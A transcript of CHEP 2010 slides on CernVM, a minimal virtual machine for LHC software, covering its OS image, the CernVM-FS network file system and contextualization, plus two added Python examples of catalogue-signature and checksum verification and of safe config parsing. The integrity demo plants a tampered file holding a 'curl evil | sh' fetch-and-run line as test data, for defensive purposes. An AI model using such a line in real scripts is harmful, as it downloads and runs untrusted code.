CHEP 2010 Taipei, 19 October
CernVM: Minimal Maintenance Approach to the Virtualization
Predrag Buncic, Jakob Blomer, Carlos Aguado Sanchez, Pere Mato, Artem Harutyunyan
CERN/PH-SFT
CernVM R&D Project
Aims to provide a complete, portable and easy to configure user environment in the form of a Virtual Machine for developing and running LHC data analysis locally and on the Grid, independent of the physical software and hardware platform (Linux, Windows, MacOS):
- Code check-out, editing, compilation, local small tests, debugging, ...
- Grid submission, data access, ...
- Event displays, interactive data analysis, ...
- Suspend, resume, ...
Project started 01/01/2008, funded for 4 years
Web site:
CernVM Users: ~3250 different IP addresses
[chart: CernVM Usage History]
[figure: Next step; PC, Mac, Linux]
Is CernVM suitable for deployment on Grid infrastructure?
What are the benefits of going the CernVM way compared with the more traditional (1) approach to batch node virtualization?
(1) Traditional approach: take a "standard" batch node [2GB], add the experiment software [10GB] and generate a VM image. Have the experiment and the security team certify the image, then deploy it to all sites and worker nodes. Repeat this procedure 1-2 times per week and per experiment.
CernVM Way
1. Minimal Linux OS (SL5)
2. CernVM-FS: HTTP network file system optimized for just-in-time delivery of experiment software
3. Configuration and contextualization mechanism
Part #1: Minimal OS image
- Just enough OS to run LHC applications
- Built using a commercial tool (rBuilder by rPath)
- Top-down approach: starting from the application and automatically discovering its dependencies
- Small images (250MB), easy to move around
rBuilder
- Initially conceived targeting ISVs (Independent Software Vendors)
- Evolving toward an end-to-end solution for process automation
- Supports component and image Development -> QA -> Release cycles
- Supports deployment of built images on multiple cloud back-ends
- Provides several upstream platforms (CentOS, Ubuntu, RHEL, rPath Linux, SL5) on which an appliance can be based
[figure: rpm imported or encapsulated into a conary package; image outputs: Amazon AMI, VMware, VirtualBox, QEMU, KVM, Parallels, HyperV, Xen; x86, x86_64, ...]
Repository Versioning
The conary package manager inspects every file on the system, detects dependencies, stores application binaries and sources into a database and automatically versions components. It allows updates and rollbacks and can reproduce the exact system configuration at any time, using multiple public and private repositories.
Built-in OS update mechanism
A minimal OS configuration translates into a less frequent need for updates (fewer packages to patch, smaller attack surface) and results in a more secure virtual environment.
Part #2: CernVM-FS
- Experiment software changes frequently, and we want to avoid the need to update, certify and redistribute VM images with every release
- Only a small fraction of a software release is really used
- CernVM-FS: read-only, network (HTTP) file system optimized for efficient software delivery. See: J. Blomer
CernVM-FS 0.48
- Deployable on virtual and physical machines
- Aggressively caches files and supports offline use
- Performance equal to or better than NFS on a LAN, better than AFS on a WAN
Security & Integrity
- Catalogs can be signed with an X.509 certificate
- File integrity is verified on download using the SHA1 checksum recorded in the (signed) catalog, so a tampered file or a misbehaving proxy is detected before the file is used
- Access control (requiring users to register their VMs) could be implemented
Scalability
- Proxy and slave servers could be deployed at strategic locations to reduce latency and provide redundancy
- Working with the ATLAS & CMS Frontier teams to reuse the already deployed squid proxy infrastructure
[figure: CernVM clients behind a layer of proxy servers, fetching from a set of HTTP servers]
CernVM-FS Summary
Separation of responsibilities
- We manage and certify the VM; the experiment manages the VO software
- VO software managers are not given access to the VM image
- Software installation and testing can be done prior to publishing, in exactly the same environment as it will be seen by the end user
Automated configuration
- CernVM-FS automatically adjusts its configuration parameters based on the client's current location
- CernVM clients automatically receive software updates
- No need for software installation/configuration that can easily go wrong
- Reduced load on experiment support teams
Use of standard tools and protocols
- Network friendly, scalable: cache on the client side, site squid caches, CDN, ...
Security and data integrity
- Repository catalogues carry the file checksums and are signed; all files have their checksums verified on download
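The verification chain described on the Security & Integrity slide and restated in this summary (signed catalogue first, then the per-file SHA1 checked on download) as an added worked example in Python. This is illustrative code written for this page, not CernVM-FS's own implementation: it assumes an HMAC over a shared key as a stand-in for the X.509/RSA catalogue signature, an in-memory dict as the content-addressed HTTP store, and constructed sample files. The control flow is the point: nothing in the catalogue is trusted until its signature verifies, and no file is handed to the application until its hash matches the catalogue.

```python
"""Client-side checks in the style of CernVM-FS: verify the catalogue's
signature before trusting it, then verify every downloaded file against
the SHA1 listed there.  Added example, not CernVM-FS code."""
import hashlib
import hmac
import json
from typing import Dict, Tuple

# Assumption: a shared secret stands in for the repository's X.509 key pair.
# Real CernVM-FS clients check an RSA signature with the publisher's
# certificate; the ordering (signature first, then per-file hash) is the same.
PUBLISHER_KEY = b"example-repository-key"


class IntegrityError(Exception):
    """Raised when a catalogue or a file fails verification."""


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def publish(files: Dict[str, bytes]) -> Tuple[Dict[str, bytes], Dict[str, object]]:
    """Publisher side: content-addressed store plus a signed catalogue.

    The store is keyed by SHA1, so clients (and squid proxies in between)
    only ever ask for immutable objects; the catalogue maps paths to hashes.
    """
    store = {sha1_hex(content): content for content in files.values()}
    entries = {path: sha1_hex(content) for path, content in files.items()}
    body = json.dumps(entries, sort_keys=True).encode()
    signature = hmac.new(PUBLISHER_KEY, body, hashlib.sha1).hexdigest()
    return store, {"body": body, "signature": signature}


def verify_catalog(catalog: Dict[str, object]) -> Dict[str, str]:
    """Reject the catalogue unless its signature checks out."""
    expected = hmac.new(PUBLISHER_KEY, catalog["body"], hashlib.sha1).hexdigest()
    if not hmac.compare_digest(expected, catalog["signature"]):
        raise IntegrityError("catalogue signature mismatch")
    return json.loads(catalog["body"])


def fetch(entries: Dict[str, str], store: Dict[str, bytes], path: str) -> bytes:
    """Download a file by hash (the in-memory store stands in for an HTTP GET
    through a proxy) and verify it before handing it to the application."""
    if path not in entries:
        raise FileNotFoundError(path)
    digest = entries[path]
    data = store[digest]  # a tampering proxy or mirror could return anything here
    if sha1_hex(data) != digest:
        raise IntegrityError(f"checksum mismatch for {path}")
    return data


# Constructed sample repository content (not real experiment software).
SAMPLE_FILES = {
    "/cms/etc/setup.sh": b"export CMS_ROOT=/opt/cms\n",
    "/cms/bin/run": b"#!/bin/sh\nexec /opt/cms/bin/cmsRun \"$@\"\n",
}


def demo() -> Tuple[bytes, bool, bool]:
    store, catalog = publish(SAMPLE_FILES)
    entries = verify_catalog(catalog)
    ok = fetch(entries, store, "/cms/etc/setup.sh")

    # A proxy or mirror serving altered content is caught by the file hash.
    bad_store = dict(store)
    bad_store[entries["/cms/bin/run"]] = b"#!/bin/sh\ncurl evil | sh\n"
    try:
        fetch(entries, bad_store, "/cms/bin/run")
        tampered_file_caught = False
    except IntegrityError:
        tampered_file_caught = True

    # A modified catalogue (e.g. a path repointed at attacker content) fails the signature.
    bad_catalog = {"body": catalog["body"].replace(b"setup", b"setuq"),
                   "signature": catalog["signature"]}
    try:
        verify_catalog(bad_catalog)
        tampered_catalog_caught = False
    except IntegrityError:
        tampered_catalog_caught = True
    return ok, tampered_file_caught, tampered_catalog_caught


if __name__ == "__main__":
    print(demo())
```

Because objects are addressed by their hash, a site squid cache or CDN can serve them without being trusted: the worst a misbehaving cache can do is cause a checksum failure and a retry, which is what makes the proxy layer on the Scalability slide safe to reuse.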
Part #3: Contextualization
There are several ways to contextualize CernVM:
- Web UI (for an individual user)
- amiconfig (for Amazon EC2 users)
- CernVM Contextualization Agent
- HEPiX CDROM method
As easy as 1, 2, 3
1. Log in to the Web interface
2. Create a user account
3. Select experiment, appliance flavor and preferences
Example contextualization section:
[cernvm]
organisations = cms
repositories = cms,grid
users = cms:cms
command = cms:/opt/cms/etc/gladein
Environment = CMS_ROOT=/opt/cms
Contextualization Summary
Basic principles:
- The owner of a VM instance can contextualize and configure it to run an arbitrary service as an unprivileged user
- A site can use the HEPiX method to inject monitoring and accounting hooks without functionally modifying the image
- If such a VM is used to host 3rd party jobs (pilot frameworks), they should run as an unprivileged user
- A wide range of contextualization options does not necessarily compromise security
- By allowing VM instances to be contextualized by their owners, we avoid the need to build, distribute and audit many different instances
For more info on CernVM contextualization:
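As an added example of applying the principles above to the [cernvm] section shown earlier: parse the section and refuse any plan whose command would run as root or as a user the section did not declare. This is illustrative code written for this page, not CernVM's amiconfig implementation; the field formats it assumes (users = name:group, command = user:absolute-path, environment = VAR=value, comma-separated lists) are inferred from the slide's values, and the sample user data is constructed from that slide.

```python
"""Parse a [cernvm] contextualization section (amiconfig-style user data as
shown on the slides) into a launch plan, enforcing that the contextualized
service runs as an unprivileged user.  Added example; not CernVM code."""
import configparser
from typing import Dict, List, Tuple

# Constructed user-data block, modelled on the slide's [cernvm] example.
SAMPLE_USER_DATA = """\
[cernvm]
organisations = cms
repositories = cms,grid
users = cms:cms
command = cms:/opt/cms/etc/gladein
environment = CMS_ROOT=/opt/cms
"""

# Assumed field formats: users = name:group[,name:group...],
# command = user:absolute-path, environment = VAR=value[,VAR=value...].
PRIVILEGED_USERS = {"root"}


class ContextError(ValueError):
    """Raised when the contextualization cannot be applied safely."""


def _csv(value: str) -> List[str]:
    return [item.strip() for item in value.split(",") if item.strip()]


def parse_context(text: str) -> Dict[str, object]:
    cp = configparser.ConfigParser()
    cp.read_string(text)
    if not cp.has_section("cernvm"):
        raise ContextError("no [cernvm] section in user data")
    sec = cp["cernvm"]

    # Accounts the owner asks for: never a privileged one.
    users: List[Tuple[str, str]] = []
    for spec in _csv(sec.get("users", "")):
        name, _, group = spec.partition(":")
        if not name or not group:
            raise ContextError(f"malformed user spec {spec!r}")
        if name in PRIVILEGED_USERS:
            raise ContextError("contextualization may not create privileged accounts")
        users.append((name, group))

    env: Dict[str, str] = {}
    for item in _csv(sec.get("environment", "")):
        var, sep, value = item.partition("=")
        if not sep or not var.isidentifier():
            raise ContextError(f"malformed environment entry {item!r}")
        env[var] = value

    # The service command must run as one of the declared unprivileged users.
    command = None
    if sec.get("command"):
        run_as, _, path = sec["command"].partition(":")
        if run_as in PRIVILEGED_USERS or run_as not in {u for u, _ in users}:
            raise ContextError(f"command must run as a declared unprivileged user, not {run_as!r}")
        if not path.startswith("/"):
            raise ContextError("command path must be absolute")
        command = (run_as, path)

    return {
        "organisations": _csv(sec.get("organisations", "")),
        "repositories": _csv(sec.get("repositories", "")),
        "users": users,
        "environment": env,
        "command": command,
    }


def rejects(text: str) -> bool:
    """True if the user data is refused by the policy checks above."""
    try:
        parse_context(text)
    except ContextError:
        return True
    return False


if __name__ == "__main__":
    print(parse_context(SAMPLE_USER_DATA))
```

The returned plan is what a contextualization agent would act on (create the accounts, export the environment, start the command under the named user); keeping the policy checks in the parser means a pilot framework injected through user data can never be promoted to root by the same mechanism.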
Conclusions
- CernVM is gaining the trust of users, making them comfortable with the use of virtualization technology
- In combination with the various contextualization options and CernVM-FS, just one small image can run the frameworks of all LHC experiments and be easily moved around, requiring far fewer updates than a traditional SL5 worker node
- The strongly versioned repository provides a full account of the image content and allows upgrades and rollbacks
- CernVM-FS provides an efficient, scalable, secure, standard and maintenance-free way to distribute software to CernVM and physical nodes alike
- Flexible contextualization options allow the same small image to play different roles, reducing the need for creation and certification of specialized images
- Using maximal process automation we derived a minimal OS platform that is ready to be deployed on various service infrastructures, does not require significant maintenance effort and does not compromise security
Backup slides
CernVM contextualization service